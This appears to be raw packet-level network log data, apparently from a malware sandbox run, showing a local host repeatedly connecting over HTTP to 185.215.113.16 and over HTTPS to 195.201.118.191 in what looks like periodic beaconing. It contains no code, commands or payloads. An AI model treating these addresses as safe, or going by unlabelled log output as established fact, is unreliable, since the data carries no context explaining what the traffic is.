Aug 19, 2024 06:06:21.442780972 CEST	80	49894	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:21.442795038 CEST	80	49893	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:21.442894936 CEST	49893	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:21.442894936 CEST	49894	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:21.443511963 CEST	49894	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:21.448286057 CEST	80	49894	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:22.201293945 CEST	80	49894	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:22.201416969 CEST	49894	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:22.203959942 CEST	49894	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:22.204289913 CEST	49895	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:22.209050894 CEST	80	49894	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:22.209112883 CEST	80	49895	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:22.209114075 CEST	49894	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:22.209196091 CEST	49895	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:22.209403038 CEST	49895	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:22.214200020 CEST	80	49895	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:22.597106934 CEST	49896	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:22.597161055 CEST	443	49896	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:22.597222090 CEST	49896	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:22.598822117 CEST	49896	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:22.598834038 CEST	443	49896	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:22.982702017 CEST	80	49895	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:22.982783079 CEST	49895	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:23.089210987 CEST	49895	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:23.089665890 CEST	49897	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:23.094548941 CEST	80	49897	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:23.094575882 CEST	80	49895	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:23.094616890 CEST	49897	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:23.094641924 CEST	49895	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:23.094830990 CEST	49897	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:23.099634886 CEST	80	49897	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:23.266546965 CEST	443	49896	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:23.266633034 CEST	49896	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:23.267219067 CEST	49896	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:23.267231941 CEST	443	49896	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:23.269016981 CEST	49896	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:23.269016981 CEST	49896	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:23.269023895 CEST	443	49896	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:23.269038916 CEST	443	49896	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:23.834549904 CEST	80	49897	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:23.835007906 CEST	49897	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:23.838176966 CEST	49897	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:23.838469982 CEST	49898	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:23.843256950 CEST	80	49898	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:23.843302011 CEST	80	49897	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:23.843368053 CEST	49898	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:23.843368053 CEST	49897	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:23.846477032 CEST	49898	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:23.851404905 CEST	80	49898	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:23.866905928 CEST	49899	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:23.866951942 CEST	443	49899	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:23.867041111 CEST	49899	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:23.867602110 CEST	49899	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:23.867613077 CEST	443	49899	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:23.972547054 CEST	443	49896	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:23.972626925 CEST	443	49896	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:23.972659111 CEST	49896	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:23.972732067 CEST	49896	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:23.974658012 CEST	49896	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:23.974668980 CEST	443	49896	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:24.545867920 CEST	443	49899	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:24.545933962 CEST	49899	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:24.546468973 CEST	49899	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:24.546474934 CEST	443	49899	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:24.549077034 CEST	49899	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:24.549081087 CEST	443	49899	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:24.608968973 CEST	80	49898	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:24.609050989 CEST	49898	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:24.714490891 CEST	49898	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:24.714890957 CEST	49900	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:24.719692945 CEST	80	49898	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:24.719712973 CEST	80	49900	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:24.719744921 CEST	49898	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:24.719794989 CEST	49900	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:24.720007896 CEST	49900	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:24.724741936 CEST	80	49900	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:25.216928959 CEST	443	49899	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:25.216986895 CEST	443	49899	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:25.217134953 CEST	443	49899	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:25.217209101 CEST	49899	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:25.217209101 CEST	49899	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:25.217609882 CEST	49899	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:25.217621088 CEST	443	49899	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:25.221036911 CEST	49901	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:25.221052885 CEST	443	49901	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:25.221164942 CEST	49901	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:25.222390890 CEST	49901	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:25.222400904 CEST	443	49901	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:25.487914085 CEST	80	49900	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:25.487997055 CEST	49900	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:25.491874933 CEST	49900	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:25.492439985 CEST	49902	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:25.497026920 CEST	80	49900	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:25.497116089 CEST	49900	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:25.497289896 CEST	80	49902	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:25.497575998 CEST	49902	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:25.497957945 CEST	49902	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:25.503071070 CEST	80	49902	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:25.887214899 CEST	443	49901	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:25.890969992 CEST	49901	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:25.891940117 CEST	49901	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:25.891944885 CEST	443	49901	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:25.893727064 CEST	49901	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:25.893732071 CEST	443	49901	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:26.281075001 CEST	80	49902	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:26.281176090 CEST	49902	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:26.386086941 CEST	49902	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:26.386504889 CEST	49903	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:26.391166925 CEST	80	49902	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:26.391211987 CEST	49902	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:26.391278982 CEST	80	49903	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:26.391336918 CEST	49903	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:26.391483068 CEST	49903	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:26.396208048 CEST	80	49903	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:26.559377909 CEST	443	49901	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:26.559406042 CEST	443	49901	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:26.559444904 CEST	49901	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:26.559474945 CEST	443	49901	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:26.559489012 CEST	49901	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:26.559492111 CEST	443	49901	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:26.559509993 CEST	49901	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:26.559537888 CEST	49901	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:26.559812069 CEST	49901	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:26.559825897 CEST	443	49901	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:27.159770966 CEST	80	49903	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:27.162688017 CEST	49903	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:27.165520906 CEST	49903	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:27.167244911 CEST	49904	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:27.171093941 CEST	80	49903	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:27.171212912 CEST	49903	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:27.172276974 CEST	80	49904	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:27.172391891 CEST	49904	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:27.176516056 CEST	49904	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:27.181355953 CEST	80	49904	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:27.937221050 CEST	80	49904	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:27.937364101 CEST	49904	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:28.042144060 CEST	49904	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:28.042155027 CEST	49905	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:28.047014952 CEST	80	49905	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:28.047267914 CEST	80	49904	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:28.047358990 CEST	49904	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:28.047358990 CEST	49905	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:28.047694921 CEST	49905	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:28.052454948 CEST	80	49905	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:28.798105001 CEST	80	49905	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:28.798209906 CEST	49905	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:28.801810026 CEST	49905	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:28.802162886 CEST	49906	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:28.806945086 CEST	80	49906	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:28.807008982 CEST	49906	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:28.807054996 CEST	80	49905	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:28.807101965 CEST	49905	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:28.807378054 CEST	49906	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:28.812167883 CEST	80	49906	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:29.580032110 CEST	80	49906	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:29.580256939 CEST	49906	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:29.697982073 CEST	49906	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:29.698354006 CEST	49907	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:29.703208923 CEST	80	49907	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:29.703313112 CEST	49907	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:29.703365088 CEST	80	49906	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:29.703674078 CEST	49906	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:29.703985929 CEST	49907	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:29.708777905 CEST	80	49907	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:30.491332054 CEST	80	49907	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:30.491409063 CEST	49907	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:30.509916067 CEST	49907	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:30.510301113 CEST	49908	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:30.515120029 CEST	80	49908	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:30.515134096 CEST	80	49907	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:30.515189886 CEST	49908	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:30.515228033 CEST	49907	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:30.518209934 CEST	49908	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:30.522965908 CEST	80	49908	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:31.295192003 CEST	80	49908	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:31.295283079 CEST	49908	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:31.400976896 CEST	49908	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:31.401493073 CEST	49909	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:31.406271935 CEST	80	49908	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:31.406297922 CEST	80	49909	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:31.406320095 CEST	49908	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:31.406375885 CEST	49909	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:31.406689882 CEST	49909	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:31.411475897 CEST	80	49909	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:32.185959101 CEST	80	49909	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:32.186058998 CEST	49909	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:32.189028025 CEST	49909	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:32.189394951 CEST	49910	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:32.194027901 CEST	80	49909	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:32.194128036 CEST	49909	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:32.194135904 CEST	80	49910	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:32.194390059 CEST	49910	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:32.194624901 CEST	49910	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:32.199503899 CEST	80	49910	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:33.237524986 CEST	80	49910	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:33.237572908 CEST	49910	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:33.355205059 CEST	49910	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:33.355583906 CEST	49911	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:33.361057043 CEST	80	49910	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:33.361102104 CEST	49910	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:33.361264944 CEST	80	49911	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:33.361325026 CEST	49911	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:33.361499071 CEST	49911	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:33.366242886 CEST	80	49911	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:34.109710932 CEST	80	49911	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:34.109769106 CEST	49911	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:34.113416910 CEST	49911	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:34.113740921 CEST	49912	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:34.118521929 CEST	80	49912	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:34.118541002 CEST	80	49911	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:34.118628979 CEST	49912	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:34.118628979 CEST	49911	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:34.119231939 CEST	49912	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:34.124066114 CEST	80	49912	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:34.891186953 CEST	80	49912	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:34.894690990 CEST	49912	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:35.010355949 CEST	49913	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:35.010355949 CEST	49912	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:35.015254974 CEST	80	49913	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:35.015465021 CEST	49913	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:35.015505075 CEST	80	49912	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:35.018616915 CEST	49913	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:35.018734932 CEST	49912	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:35.023852110 CEST	80	49913	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:35.783849001 CEST	80	49913	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:35.784146070 CEST	49913	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:35.966016054 CEST	49913	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:35.966389894 CEST	49914	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:35.971482038 CEST	80	49913	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:35.971494913 CEST	80	49914	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:35.971585035 CEST	49913	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:35.971585035 CEST	49914	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:35.974618912 CEST	49914	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:35.979875088 CEST	80	49914	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:36.744165897 CEST	80	49914	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:36.744385004 CEST	49914	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:36.857137918 CEST	49914	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:36.857541084 CEST	49915	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:36.863070965 CEST	80	49914	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:36.863183022 CEST	49914	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:36.863261938 CEST	80	49915	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:36.863473892 CEST	49915	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:36.863909006 CEST	49915	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:36.868937969 CEST	80	49915	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:37.065128088 CEST	49916	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:37.065215111 CEST	443	49916	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:37.065321922 CEST	49916	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:37.068479061 CEST	49916	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:37.068530083 CEST	443	49916	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:37.611967087 CEST	80	49915	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:37.612016916 CEST	49915	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:37.616036892 CEST	49915	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:37.616441011 CEST	49917	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:37.621284008 CEST	80	49917	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:37.621313095 CEST	80	49915	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:37.621350050 CEST	49917	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:37.621368885 CEST	49915	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:37.621646881 CEST	49917	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:37.626446009 CEST	80	49917	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:37.747771978 CEST	443	49916	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:37.747838020 CEST	49916	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:37.748342991 CEST	49916	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:37.748363972 CEST	443	49916	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:37.749989033 CEST	49916	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:37.750003099 CEST	443	49916	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:37.750087023 CEST	49916	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:37.750113010 CEST	443	49916	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:37.750144005 CEST	49916	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:37.750160933 CEST	443	49916	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:37.750200987 CEST	49916	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:37.750235081 CEST	443	49916	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:38.086308956 CEST	49918	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:38.086395025 CEST	443	49918	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:38.086498022 CEST	49918	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:38.086769104 CEST	49918	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:38.086796045 CEST	443	49918	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:38.404846907 CEST	80	49917	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:38.405170918 CEST	49917	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:38.550235987 CEST	49917	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:38.550870895 CEST	49919	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:38.555435896 CEST	80	49917	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:38.555684090 CEST	80	49919	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:38.555720091 CEST	49917	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:38.555850029 CEST	49919	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:38.558068991 CEST	49919	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:38.562834978 CEST	80	49919	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:38.678730011 CEST	443	49916	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:38.678817987 CEST	443	49916	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:38.678864956 CEST	49916	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:38.679168940 CEST	49916	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:38.719324112 CEST	49916	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:38.719389915 CEST	443	49916	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:38.739698887 CEST	443	49918	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:38.742161989 CEST	49918	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:38.758953094 CEST	49918	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:38.758972883 CEST	443	49918	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:38.790950060 CEST	49918	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:38.790950060 CEST	49918	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:38.790977001 CEST	443	49918	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:38.791013002 CEST	443	49918	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:39.074368954 CEST	49920	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:39.074409962 CEST	443	49920	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:39.074472904 CEST	49920	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:39.074743986 CEST	49920	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:39.074757099 CEST	443	49920	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:39.305931091 CEST	80	49919	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:39.305995941 CEST	49919	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:39.308799028 CEST	49919	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:39.309111118 CEST	49921	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:39.313992023 CEST	80	49919	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:39.314019918 CEST	80	49921	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:39.314055920 CEST	49919	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:39.314112902 CEST	49921	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:39.314310074 CEST	49921	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:39.319139004 CEST	80	49921	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:39.534118891 CEST	443	49918	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:39.534193993 CEST	49918	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:39.534245014 CEST	443	49918	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:39.534297943 CEST	49918	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:39.534322977 CEST	443	49918	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:39.534368992 CEST	49918	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:39.534502029 CEST	443	49918	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:39.534547091 CEST	49918	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:39.535700083 CEST	49918	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:39.535731077 CEST	443	49918	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:39.806224108 CEST	443	49920	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:39.806322098 CEST	49920	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:39.806818962 CEST	49920	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:39.806827068 CEST	443	49920	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:39.808494091 CEST	49920	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:39.808494091 CEST	49920	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:39.808502913 CEST	443	49920	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:39.808514118 CEST	443	49920	195.201.118.191	192.168.2.4
